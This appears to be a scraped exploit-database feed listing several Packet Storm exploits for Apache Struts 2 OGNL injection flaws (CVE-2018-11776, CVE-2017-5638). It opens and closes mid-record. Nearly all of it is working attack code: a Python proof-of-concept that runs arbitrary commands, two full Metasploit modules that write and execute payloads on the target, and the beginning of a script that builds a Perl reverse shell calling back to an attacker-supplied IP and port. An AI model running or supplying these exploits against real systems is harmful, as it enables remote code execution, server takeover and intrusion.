"`#!/usr/bin/python \n# -*- coding: utf-8 -*- \n \n# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter \n \nimport sys \nimport urllib \nimport urllib2 \nimport httplib \n \n \ndef exploit(host,cmd): \nprint \"[Execute]: {}\".format(cmd) \n \nognl_payload = \"${\" \nognl_payload += \"(#_memberAccess['allowStaticMethodAccess']=true).\" \nognl_payload += \"(#cmd='{}').\".format(cmd) \nognl_payload += \"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\" \nognl_payload += \"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).\" \nognl_payload += \"(#p=new java.lang.ProcessBuilder(#cmds)).\" \nognl_payload += \"(#p.redirectErrorStream(true)).\" \nognl_payload += \"(#process=#p.start()).\" \nognl_payload += \"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).\" \nognl_payload += \"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\" \nognl_payload += \"(#ros.flush())\" \nognl_payload += \"}\" \n \nif not \":\" in host: \nhost = \"{}:8080\".format(host) \n \n# encode the payload \nognl_payload_encoded = urllib.quote_plus(ognl_payload) \n \n# further encoding \nurl = \"http://{}/{}/help.action\".format(host, ognl_payload_encoded.replace(\"+\",\"%20\").replace(\" \", \"%20\").replace(\"%2F\",\"/\")) \n \nprint \"[Url]: {}\\n\\n\\n\".format(url) \n \ntry: \nrequest = urllib2.Request(url) \nresponse = urllib2.urlopen(request).read() \nexcept httplib.IncompleteRead, e: \nresponse = e.partial \nprint response \n \n \nif len(sys.argv) < 3: \nsys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0]) \nelse: \nexploit(sys.argv[1],sys.argv[2]) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149087/apachestruts23252-exec.txt"}, {"lastseen": "2018-09-08T18:08:24", "description": "", "cvss3": {}, "published": "2018-09-07T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 Namespace Redirect OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-07T00:00:00", "id": "PACKETSTORM:149277", "href": "https://packetstormsecurity.com/files/149277/Apache-Struts-2-Namespace-Redirect-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \n# Eschewing CmdStager for now, since the use of '\\' and ';' are killing me \n#include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vulnerability in Apache Struts \nversion 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed \nvia an endpoint that makes use of a redirect action. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n#TODO: Is that second paragraph above still accurate? \n'Author' => [ \n'Man Yue Mo', # Discovery \n'hook-s3c', # PoC \n'asoto-r7', # Metasploit module \n'wvu' # Metasploit module \n], \n'References' => [ \n['CVE', '2018-11776'], \n['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'], \n['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'], \n], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Automatic detection', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n[ \n'Windows', { \n'Platform' => %w{ windows }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n[ \n'Linux', { \n'Platform' => %w{ unix linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'} \n}, \n], \n], \n'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018 \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]), \nOptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]), \nOptString.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]), \nOptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ), \nOptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ), \n] \n) \nend \n \ndef check \n# METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable \nognl = \"#_memberAccess['allowStaticMethodAccess']\" \n \nresp = send_struts_request(ognl) \n \n# If vulnerable, the server should return an HTTP 302 (Redirect) \n# and the 'Location' header should contain either 'true' or 'false' \nif resp && resp.headers['Location'] \noutput = resp.headers['Location'] \nvprint_status(\"Redirected to: #{output}\") \nif (output.include? '/true/') \nprint_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\") \ndatastore['ENABLE_STATIC'] = false \nCheckCode::Vulnerable \nelsif (output.include? '/false/') \nprint_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\") \ndatastore['ENABLE_STATIC'] = true \nCheckCode::Vulnerable \nelse \nCheckCode::Safe \nend \nelsif resp && resp.code==400 \n# METHOD 2: Generate two random numbers, ask the target to add them together. \n# If it does, it's vulnerable. \na = rand(10000) \nb = rand(10000) \nc = a+b \n \nognl = \"#{a}+#{b}\" \n \nresp = send_struts_request(ognl) \n \nif resp.headers['Location'].include? c.to_s \nvprint_status(\"Redirected to: #{resp.headers['Location']}\") \nprint_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\") \ndatastore['ENABLE_STATIC'] = false \nCheckCode::Vulnerable \nelse \nCheckCode::Safe \nend \nend \nend \n \ndef exploit \ncase payload.arch.first \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload() \nend \nend \n \ndef encode_ognl(ognl) \n# Check and fail if the command contains the follow bad characters: \n# ';' seems to terminates the OGNL statement \n# '/' causes the target to return an HTTP/400 error \n# '\\' causes the target to return an HTTP/400 error (sometimes?) \n# '\\r' ends the GET request prematurely \n# '\\n' ends the GET request prematurely \n \n# TODO: Make sure the following line is uncommented \nbad_chars = %w[; \\\\ \\r \\n] # and maybe '/' \nbad_chars.each do |c| \nif ognl.include? c \nprint_error(\"Bad OGNL request: #{ognl}\") \nfail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\") \nend \nend \n \n# The following list of characters *must* be encoded or ORNL will asplode \nencodable_chars = { \"%\": \"%25\", # Always do this one first. :-) \n\" \": \"%20\", \n\"\\\"\":\"%22\", \n\"#\": \"%23\", \n\"'\": \"%27\", \n\"<\": \"%3c\", \n\">\": \"%3e\", \n\"?\": \"%3f\", \n\"^\": \"%5e\", \n\"`\": \"%60\", \n\"{\": \"%7b\", \n\"|\": \"%7c\", \n\"}\": \"%7d\", \n#\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal. \n#\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround? \n#\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround? \n#\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround? \n} \n \nencodable_chars.each do |k,v| \n#ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp) \nognl.gsub!(\"#{k}\",\"#{v}\") \nend \nreturn ognl \nend \n \ndef send_struts_request(ognl, payload: nil) \n=begin #badchar-checking code \npre = ognl \n=end \n \nognl = \"${#{ognl}}\" \nvprint_status(\"Submitted OGNL: #{ognl}\") \nognl = encode_ognl(ognl) \n \nheaders = {'Keep-Alive': 'timeout=5, max=1000'} \n \nif payload \nvprint_status(\"Embedding payload of #{payload.length} bytes\") \nheaders[datastore['HEADER']] = payload \nend \n \n# TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs \nuri = \"/#{ognl}/#{datastore['ACTION']}\" \n \nresp = send_request_cgi( \n#'encode' => true, # this fails to encode '\\', which is a problem for me \n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\") \nend \n \n=begin #badchar-checking code \nprint_status(\"Response code: #{resp.code}\") \n#print_status(\"Response recv: BODY '#{resp.body}'\") if resp.body \nif resp.headers['Location'] \nprint_status(\"Response recv: LOC: #{resp.headers['Location'].split('/')[1]}\") \nif resp.headers['Location'].split('/')[1] == pre[1..-2] \nprint_good(\"GOT 'EM!\") \nelse \nprint_error(\" #{pre[1..-2]}\") \nend \nend \n=end \n \nresp \nend \n \ndef profile_target \n# Use OGNL to extract properties from the Java environment \n \nproperties = { 'os.name': nil, # e.g. 'Linux' \n'os.arch': nil, # e.g. 'amd64' \n'os.version': nil, # e.g. '4.4.0-112-generic' \n'user.name': nil, # e.g. 'root' \n#'user.home': nil, # e.g. '/root' (didn't work in testing) \n'user.language': nil, # e.g. 'en' \n#'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing) \n} \n \nognl = \"\" \nognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] \nognl << %Q|('#{rand_text_alpha(2)}')| \nproperties.each do |k,v| \nognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'| \nend \nognl = ognl[0...-4] \n \nr = send_struts_request(ognl) \n \nif r.code == 400 \nfail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\") \nelsif r.headers['Location'] \n# r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action' \n# Extract the OGNL output from the Location path, and strip the two random chars \ns = r.headers['Location'].split('/')[1][2..-1] \n \nif s.nil? \n# Since the target didn't respond with an HTTP/400, we know the OGNL code executed. \n# But we didn't get any output, so we can't profile the target. Abort. \nreturn nil \nend \n \n# Confirm that all fields were returned, and non include extra (:) delimiters \n# If the OGNL fails, we might get a partial result back, in which case, we'll abort. \nif s.count(':') > properties.length \nprint_error(\"Failed to profile target. Response from server: #{r.to_s}\") \nfail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\") \nend \n \n# Separate the colon-delimited properties and store in the 'properties' hash \ns = s.split(':') \ni = 0 \nproperties.each do |k,v| \nproperties[k] = s[i] \ni += 1 \nend \n \nprint_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" + \n\" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\") \nreturn properties \nelse \nprint_error(\"Failed to profile target. Response from server: #{r.to_s}\") \nfail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\") \nend \nend \n \ndef execute_command(cmd_input, opts={}) \n# Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that. \nif cmd_input.include? ';' \nprint_warning(\"WARNING: Command contains bad characters: semicolons (;).\") \nend \n \nbegin \nproperties = profile_target \nos = properties[:'os.name'].downcase \nrescue \nvprint_warning(\"Target profiling was unable to determine operating system\") \nos = '' \nos = 'windows' if datastore['PAYLOAD'].downcase.include? 'win' \nos = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux' \nos = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix' \nend \n \nif (os.include? 'linux') || (os.include? 'nix') \ncmd = \"{'sh','-c','#{cmd_input}'}\" \nelsif os.include? 'win' \ncmd = \"{'cmd.exe','/c','#{cmd_input}'}\" \nelse \nvprint_error(\"Failed to detect target OS. Attempting to execute command directly\") \ncmd = cmd_input \nend \n \n# The following OGNL will run arbitrary commands on Windows and Linux \n# targets, as well as returning STDOUT and STDERR. In my testing, \n# on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds. \n \nvprint_status(\"Executing: #{cmd}\") \n \nognl = \"\" \nognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] \nognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start()).| \nognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).| \nognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).| \nognl << %q|(#r.flush())| \n \nr = send_struts_request(ognl) \n \nif r && r.code == 200 \nprint_good(\"Command executed:\\n#{r.body}\") \nelsif r \nif r.body.length == 0 \nprint_status(\"Payload sent, but no output provided from server.\") \nelsif r.body.length > 0 \nprint_error(\"Failed to run command. Response from server: #{r.to_s}\") \nend \nend \nend \n \ndef send_payload \n# Probe for the target OS and architecture \nbegin \nproperties = profile_target \nos = properties[:'os.name'].downcase \nrescue \nvprint_warning(\"Target profiling was unable to determine operating system\") \nos = '' \nos = 'windows' if datastore['PAYLOAD'].downcase.include? 'win' \nos = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux' \nos = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix' \nend \n \ndata_header = datastore['HEADER'] \nif data_header.empty? \nfail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\") \nend \n \nrandom_filename = datastore['TEMPFILE'] \n \n# d = data stream from HTTP header \n# f = path to temp file \n# s = stream/handle to temp file \nognl = \"\" \nognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] \nognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','tmp')).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#s=new java.io.FileOutputStream(#f)).| \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).| \nognl << %q|(#s.write(#d)).| \nognl << %q|(#s.close()).| \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete()).| \n \nsuccess_string = rand_text_alpha(4) \nognl << %Q|('#{success_string}')| \n \nexe = [generate_payload_exe].pack(\"m\").delete(\"\\n\") \nr = send_struts_request(ognl, payload: exe) \n \nif r && r.headers && r.headers['Location'].split('/')[1] == success_string \nprint_good(\"Payload successfully dropped and executed.\") \nelsif r && r.headers['Location'] \nvprint_error(\"RESPONSE: \" + r.headers['Location']) \nfail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\") \nelsif r && r.code == 400 \nfail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149277/struts2_namespace_ognl.rb.txt"}, {"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141630", "href": "https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vunlerability in Apache Struts \nversion 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed \nvia http Content-Type header. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n'Author' => [ \n'Nike.Zheng', # PoC \n'Nixawk', # Metasploit module \n'Chorder', # Metasploit module \n'egypt', # combining the above \n'Jeffrey Martin', # Java fu \n], \n'References' => [ \n['CVE', '2017-5638'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045'] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Universal', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n], \n'DisclosureDate' => 'Mar 07 2017', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]) \n] \n) \n \n@data_header = \"X-#{rand_text_alpha(4)}\" \nend \n \ndef check \nvar_a = rand_text_alpha_lower(4) \n \nognl = \"\" \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))| \n \nbegin \nresp = send_struts_request(ognl) \nrescue Msf::Exploit::Failed \nreturn Exploit::CheckCode::Unknown \nend \n \nif resp && resp.code == 200 && resp.headers[var_a] \nvprint_good(\"Victim operating system: #{resp.headers[var_a]}\") \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \ncase payload.arch.first \n#when ARCH_JAVA \n# datastore['LHOST'] = nil \n# resp = send_payload(payload.encoded_jar) \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload(generate_payload_exe) \nend \n \nrequire'pp' \npp resp.headers if resp \nend \n \ndef send_struts_request(ognl, extra_header: '') \nuri = normalize_uri(datastore[\"TARGETURI\"]) \ncontent_type = \"%{(#_='multipart/form-data').\" \ncontent_type << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \ncontent_type << \"(#_memberAccess?\" \ncontent_type << \"(#_memberAccess=#dm):\" \ncontent_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \ncontent_type << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \ncontent_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\" \ncontent_type << \"(#ognlUtil.getExcludedClasses().clear()).\" \ncontent_type << \"(#context.setMemberAccess(#dm)))).\" \ncontent_type << ognl \ncontent_type << \"}\" \n \nheaders = { 'Content-Type' => content_type } \nif extra_header \nheaders[@data_header] = extra_header \nend \n \n#puts content_type.gsub(\").\", \").\\n\") \n#puts \n \nresp = send_request_cgi( \n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') \nend \nresp \nend \n \ndef execute_command(cmd) \nognl = '' \nognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \n \n# You can add headers to the server's response for debugging with this: \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('decoded',#cmd)).| \n \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).| \nognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start())| \n \nsend_struts_request(ognl, extra_header: cmd) \nend \n \ndef send_payload(exe) \n \nognl = \"\" \nognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).| \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#fos=new java.io.FileOutputStream(#f)).| \n \n# Using stuff from the sun.* package here means it likely won't work on \n# non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to \n# work and I don't see a better way of getting binary data onto the \n# system. =/ \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).| \nognl << %q|(#fos.write(#d)).| \nognl << %q|(#fos.close()).| \n \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete())| \n \nsend_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\")) \nend \n \nend \n \n=begin \nDoesn't work: \n \nognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).| \nognl << %q|(#c=#cl.loadClass('metasploit.Payload')).| \nognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).| \nognl << %q|(#r.addHeader('meth',#m.toGenericString())).| \nognl << %q|(#m.invoke(null,null)).| \n \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6 \n \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884 \n \n=end \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt"}, {"lastseen": "2017-03-12T01:15:38", "description": "", "cvss3": {}, "published": "2017-03-10T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T00:00:00", "id": "PACKETSTORM:141576", "href": "https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html", "sourceData": "`# CVE-2017-5638 \n# Apache Struts 2 Vulnerability Remote Code Execution \n# Reverse shell from target \n# Author: anarc0der - github.com/anarcoder \n# Tested with tomcat8 \n \n# Install tomcat8 \n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 \n \n# Ex: \n# Open: $ nc -lnvp 4444 \n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444 \n \n\"\"\" \nUsage: \nstruntsrce.py --target=<arg> --ip=<arg> --port=<arg> \nstruntsrce.py --help \nstruntsrce.py --version \n \nOptions: \n-h --help Open help menu \n-v --version Show version \nRequired options: \n--target='url target' your target :) \n--ip='10.10.10.1' your ip \n--port=4444 open port for back connection \n \n\"\"\" \n \nimport urllib2 \nimport httplib \nimport os \nimport sys \nfrom docopt import docopt, DocoptExit \n \n \nclass CVE_2017_5638(): \n \ndef __init__(self, p_target, p_ip, p_port): \nself.target = p_target \nself.ip = p_ip \nself.port = p_port \nself.revshell = self.generate_revshell() \nself.payload = self.generate_payload() \nself.exploit() \n \ndef generate_revshell(self): \nrevshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\ \n\"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\ \n\"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\ \n\"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\ \n\"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\" \nreturn revshell.format(self.ip, self.port) \n \ndef generate_payload(self): \npayload = \"%{{(#_='multipart/form-data').\"\\ 